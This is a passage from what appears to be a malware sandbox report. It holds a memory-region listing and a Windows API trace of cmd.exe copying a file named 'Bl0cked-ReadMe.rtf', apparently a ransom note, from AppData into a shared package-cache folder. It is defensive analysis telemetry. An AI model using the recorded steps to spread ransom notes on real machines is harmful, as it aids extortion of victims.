name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30576 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30577 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30578 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30579 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30580 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30581 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30582 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30583 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30584 start_va = 0x400000 end_va = 0x4c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 30585 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30586 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30587 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 30588 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 30589 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 30590 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 30591 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 30592 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 30593 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 697 os_tid = 0x69c [0207.277] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afba4 | out: lpSystemTimeAsFileTime=0x1afba4*(dwLowDateTime=0xb05b9e40, dwHighDateTime=0x1d440a9)) [0207.277] GetCurrentProcessId () returned 0x924 [0207.277] GetCurrentThreadId () returned 0x69c [0207.277] GetTickCount () returned 0x3a505 [0207.277] QueryPerformanceCounter (in: lpPerformanceCount=0x1afb9c | out: lpPerformanceCount=0x1afb9c*=26406880618) returned 1 [0207.283] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0207.283] __set_app_type (_Type=0x1) [0207.283] __p__fmode () returned 0x76b331f4 [0207.283] __p__commode () returned 0x76b331fc [0207.283] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0207.283] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0207.284] GetCurrentThreadId () returned 0x69c [0207.284] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x69c) returned 0x38 [0207.284] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0207.284] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0207.284] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.284] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0207.284] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afb34 | out: phkResult=0x1afb34*=0x0) returned 0x2 [0207.284] VirtualQuery (in: lpAddress=0x1afb6b, lpBuffer=0x1afb04, dwLength=0x1c | out: lpBuffer=0x1afb04*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0207.284] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afb04, dwLength=0x1c | out: lpBuffer=0x1afb04*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0207.284] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afb04, dwLength=0x1c | out: lpBuffer=0x1afb04*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0207.284] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afb04, dwLength=0x1c | out: lpBuffer=0x1afb04*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0207.284] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afb04, dwLength=0x1c | out: lpBuffer=0x1afb04*(BaseAddress=0x1b0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x50000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0207.284] GetConsoleOutputCP () returned 0x1b5 [0207.285] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0207.285] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0207.285] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.285] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0207.285] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.285] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0207.285] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.285] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0207.286] _get_osfhandle (_FileHandle=0) returned 0x3 [0207.286] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0207.286] _get_osfhandle (_FileHandle=0) returned 0x3 [0207.286] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0207.286] GetEnvironmentStringsW () returned 0x210190* [0207.286] FreeEnvironmentStringsW (penv=0x210190) returned 1 [0207.287] GetEnvironmentStringsW () returned 0x210190* [0207.287] FreeEnvironmentStringsW (penv=0x210190) returned 1 [0207.287] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aeaa4 | out: phkResult=0x1aeaa4*=0x40) returned 0x0 [0207.287] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x0, lpData=0x1aeab0*=0xb8, lpcbData=0x1aeaa8*=0x1000) returned 0x2 [0207.287] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x4, lpData=0x1aeab0*=0x1, lpcbData=0x1aeaa8*=0x4) returned 0x0 [0207.287] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x0, lpData=0x1aeab0*=0x1, lpcbData=0x1aeaa8*=0x1000) returned 0x2 [0207.287] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x4, lpData=0x1aeab0*=0x0, lpcbData=0x1aeaa8*=0x4) returned 0x0 [0207.287] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x4, lpData=0x1aeab0*=0x40, lpcbData=0x1aeaa8*=0x4) returned 0x0 [0207.287] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x4, lpData=0x1aeab0*=0x40, lpcbData=0x1aeaa8*=0x4) returned 0x0 [0207.287] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x0, lpData=0x1aeab0*=0x40, lpcbData=0x1aeaa8*=0x1000) returned 0x2 [0207.287] RegCloseKey (hKey=0x40) returned 0x0 [0207.287] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aeaa4 | out: phkResult=0x1aeaa4*=0x40) returned 0x0 [0207.287] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x0, lpData=0x1aeab0*=0x40, lpcbData=0x1aeaa8*=0x1000) returned 0x2 [0207.287] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x4, lpData=0x1aeab0*=0x1, lpcbData=0x1aeaa8*=0x4) returned 0x0 [0207.288] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x0, lpData=0x1aeab0*=0x1, lpcbData=0x1aeaa8*=0x1000) returned 0x2 [0207.288] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x4, lpData=0x1aeab0*=0x0, lpcbData=0x1aeaa8*=0x4) returned 0x0 [0207.288] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x4, lpData=0x1aeab0*=0x9, lpcbData=0x1aeaa8*=0x4) returned 0x0 [0207.288] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x4, lpData=0x1aeab0*=0x9, lpcbData=0x1aeaa8*=0x4) returned 0x0 [0207.288] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x0, lpData=0x1aeab0*=0x9, lpcbData=0x1aeaa8*=0x1000) returned 0x2 [0207.288] RegCloseKey (hKey=0x40) returned 0x0 [0207.288] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a9 [0207.288] srand (_Seed=0x5b8863a9) [0207.288] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\Bl0cked-ReadMe.rtf\"" [0207.288] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\Bl0cked-ReadMe.rtf\"" [0207.289] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0207.289] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2118f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0207.290] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0207.290] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.290] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0207.290] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0207.290] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0207.290] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0207.290] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0207.290] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0207.290] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0207.290] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0207.290] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0207.290] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0207.290] GetEnvironmentStringsW () returned 0x2122e0* [0207.291] FreeEnvironmentStringsW (penv=0x2122e0) returned 1 [0207.291] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.291] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0207.291] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0207.291] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0207.291] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0207.291] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0207.291] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0207.291] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0207.291] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0207.291] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0207.291] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af870 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0207.291] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af870, lpFilePart=0x1af86c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af86c*="Desktop") returned 0x18 [0207.291] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0207.291] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af5ec | out: lpFindFileData=0x1af5ec) returned 0x210020 [0207.292] FindClose (in: hFindFile=0x210020 | out: hFindFile=0x210020) returned 1 [0207.292] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af5ec | out: lpFindFileData=0x1af5ec) returned 0x210020 [0207.292] FindClose (in: hFindFile=0x210020 | out: hFindFile=0x210020) returned 1 [0207.292] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af5ec | out: lpFindFileData=0x1af5ec) returned 0x210020 [0207.292] FindClose (in: hFindFile=0x210020 | out: hFindFile=0x210020) returned 1 [0207.294] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0207.294] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0207.294] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0207.294] GetEnvironmentStringsW () returned 0x212b00* [0207.295] FreeEnvironmentStringsW (penv=0x212b00) returned 1 [0207.295] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0207.295] GetConsoleOutputCP () returned 0x1b5 [0207.295] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0207.295] GetUserDefaultLCID () returned 0x409 [0207.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0207.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af9b0, cchData=128 | out: lpLCData="0") returned 2 [0207.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af9b0, cchData=128 | out: lpLCData="0") returned 2 [0207.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af9b0, cchData=128 | out: lpLCData="1") returned 2 [0207.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0207.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0207.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0207.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0207.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0207.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0207.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0207.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0207.296] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0207.297] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0207.297] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0207.298] GetConsoleTitleW (in: lpConsoleTitle=0x2008e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.298] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0207.298] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0207.298] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0207.298] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0207.299] _wcsicmp (_String1="type", _String2=")") returned 75 [0207.299] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0207.299] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0207.299] _wcsicmp (_String1="IF", _String2="type") returned -11 [0207.299] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0207.299] _wcsicmp (_String1="REM", _String2="type") returned -2 [0207.299] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0207.304] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.305] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.305] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.305] GetFileType (hFile=0x7) returned 0x2 [0207.305] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.305] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1af8a8 | out: lpMode=0x1af8a8) returned 1 [0207.305] _dup (_FileHandle=1) returned 3 [0207.305] _close (_FileHandle=1) returned 0 [0207.305] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0207.305] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\packag~1\\{f325f~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1af878, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0207.307] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0207.307] GetConsoleTitleW (in: lpConsoleTitle=0x1af6a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.307] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0207.307] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0207.307] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0207.307] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0207.308] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0207.308] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x1af20c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af20c) returned 0x200e80 [0207.308] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0207.308] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0207.308] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0207.308] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ae118, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0207.309] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0207.309] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.309] GetFileType (hFile=0x54) returned 0x1 [0207.309] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.309] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1ae170 | out: lpFileSizeHigh=0x1ae170*=0x0) returned 0x1632 [0207.309] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.309] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0207.309] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.309] ReadFile (in: hFile=0x54, lpBuffer=0x1aefa8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae198, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesRead=0x1ae198*=0x200, lpOverlapped=0x0) returned 1 [0207.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.309] GetFileType (hFile=0x4c) returned 0x1 [0207.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.309] GetFileType (hFile=0x4c) returned 0x1 [0207.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.309] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.310] GetFileType (hFile=0x4c) returned 0x1 [0207.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.310] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aeff8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.310] GetFileType (hFile=0x4c) returned 0x1 [0207.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.310] WriteFile (in: hFile=0x4c, lpBuffer=0x1af048*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af048*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.310] GetFileType (hFile=0x4c) returned 0x1 [0207.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.311] WriteFile (in: hFile=0x4c, lpBuffer=0x1af098*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af098*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.311] GetFileType (hFile=0x4c) returned 0x1 [0207.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.311] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af0e8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.313] GetFileType (hFile=0x4c) returned 0x1 [0207.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.313] WriteFile (in: hFile=0x4c, lpBuffer=0x1af138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af138*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.313] GetFileType (hFile=0x4c) returned 0x1 [0207.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.313] WriteFile (in: hFile=0x4c, lpBuffer=0x1af188*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af188*, lpNumberOfBytesWritten=0x1ae18c*=0x20, lpOverlapped=0x0) returned 1 [0207.313] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.313] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 